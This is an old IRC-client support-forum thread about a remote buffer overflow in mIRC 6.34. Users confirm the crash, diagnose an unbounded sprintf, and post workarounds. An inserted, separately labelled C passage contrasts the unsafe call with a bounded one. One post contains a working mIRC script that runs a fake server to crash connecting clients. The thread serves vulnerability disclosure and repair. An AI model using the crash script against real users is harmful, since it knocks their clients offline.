#204830 - 03/10/08 10:38 AM
Mirc 6.34 Remote Buffer Overflow
emm1
newbie
Registered: 03/10/08
Posts: 1
Hello, I was just notified of this bug here. Hopefully someone can address it quickly.
http://www.milw0rm.com/exploits/6654
#204831 - 03/10/08 01:05 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: emm1]
Collective
Carpal Tunnel
Registered: 10/12/02
Posts: 3195
Loc: London, UK
Confirmed, crashes a clean mIRC 6.34.
#204832 - 03/10/08 01:36 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: emm1]
Khaled
Pooh-Bah
Registered: 05/12/02
Posts: 1859
This is a server-based exploit, not a user-based exploit, so as long as you're connecting to a trusted IRC network, such as one of the major networks, you should be fine.
That said, I can't seem to reproduce this issue here so far, neither in a clean install of the release version nor in a debug version of mIRC.
When I test the perl script and make mIRC connect to the local perl server, nothing happens, other than a disconnect from the server because the server sequence is incorrect.
When I test the same string sequence using internal debugging in mIRC, again nothing happens other than mIRC opening a query window to that user.
I'll continue to try to reproduce this issue and if verified I should have an update out shortly.
#204867 - 04/10/08 02:53 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: Khaled]
Pivo
journeyman
Registered: 23/06/08
Posts: 58
That Perl Script is crashing both my modified and my clean installation of mIRC. Screenshot Windows XP Service Pack 3, mIRC 6.34, ...
Edit: I have translated this into an mIRC script, for easier testing... To start listening, type /crash ...
alias crash {
  ; check for open sockets
  if ($sock(crashing*)) {
    sockclose crashing*
    echo -sgt Crash-Sockets closed.
    return
  }
  ; determining port
  var %p = 6667
  while (!$portfree(%p) && %p <= 65535) { inc %p }
  if (%p >= 65536) { echo -sgt ERROR: Socket could not be created. | return }
  ; listening
  socklisten crashing %p
  if (!$sock(crashing)) { echo -sgt ERROR: Socket could not be created. | return }
  echo -sgt Crash-Socket listening...
  echo -sgt Type 04/server localhost %p $+ to crash mirc.
}
on *:socklisten:crashing: {
  var %s = crashing. $+ $ticks
  sockaccept %s
  sockwrite -n %s :irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow
  sockwrite -n %s $+(:,$str(A,313),CC) PRIVMSG yow : /FINGER yow.
  echo -sgt Sending crash-message to $sock(%s).ip
  .timer 1 3 sockclose %s
}
Edited by Pivo (04/10/08 05:30 PM)
#204899 - 05/10/08 12:24 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: Khaled]
Sat
addict
Registered: 19/04/04
Posts: 531
Loc: The Netherlands
The problem is with the sprintf(buf, "f%s", nick); of the code getting the font for the new query window from mirc.ini - buf is 300 bytes, nick is taken directly from the server.
Temporary workaround until the new mIRC is out:
on ^*:OPEN:?:*:if ($len($nick) > 298) halt
Other, more invasive workarounds: use a dedicated query window, put queries on ignore, etc.
_________________________
Saturn, QuakeNet staff
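
The unbounded `sprintf` described in the post above, next to a bounded form, as an added example that is not from the original thread or from mIRC's source; the function names and the reject-on-truncation policy are assumptions. It also shows where the workaround's 298 comes from: `f` plus the nick plus the terminating NUL must fit in 300 bytes.

```c
#include <stdio.h>
#include <string.h>

#define FONT_KEY_SIZE 300  /* buffer size stated in the thread */

/* Pattern described in the thread: no bound on the server-supplied nick.
 * Stays in bounds only when strlen(nick) <= FONT_KEY_SIZE - 2. */
void font_key_unsafe(char *buf, const char *nick)
{
    sprintf(buf, "f%s", nick);
}

/* Hardened form (hypothetical helper): bounded write, truncation is an error.
 * Returns 0 on success, -1 if the key would not fit in the buffer. */
int font_key_checked(char *buf, size_t size, const char *nick)
{
    int n = snprintf(buf, size, "f%s", nick);
    if (n < 0 || (size_t)n >= size) {
        if (size > 0)
            buf[0] = '\0';   /* never hand back a truncated key */
        return -1;
    }
    return 0;
}

/* Longest nick that fits: 'f' + nick + NUL <= size. */
size_t max_nick_len(size_t size)
{
    return size >= 2 ? size - 2 : 0;
}

int main(void)
{
    char buf[FONT_KEY_SIZE];
    char nick[400];
    font_key_unsafe(buf, "yow");   /* short nick: within bounds */
    printf("unsafe, short nick: %s\n", buf);

    /* Constructed inputs at and around the boundary. */
    size_t lens[] = { 3, 298, 299, 315 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        memset(nick, 'A', lens[i]);
        nick[lens[i]] = '\0';
        int rc = font_key_checked(buf, sizeof buf, nick);
        printf("nick length %zu -> %s\n", lens[i], rc == 0 ? "ok" : "rejected");
    }
    printf("max nick length: %zu\n", max_nick_len(FONT_KEY_SIZE));
    return 0;
}
```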
#204962 - 07/10/08 07:15 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: Sat]
Khaled
Pooh-Bah
Registered: 05/12/02
Posts: 1859
Thanks, I have been able to reproduce this issue and should have an update ready for release soon. In the meantime, the above script-based fix posted by Sat resolves the issue, as does enabling the "Use single message window" option in the mIRC Options/IRC dialog.
#204965 - 07/10/08 11:59 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: Khaled]
Trashlord_
journeyman
Registered: 26/10/07
Posts: 52
Loc: Israel
Just wanted to add that I have tested this under WINE in Linux, and mIRC crashes there as well.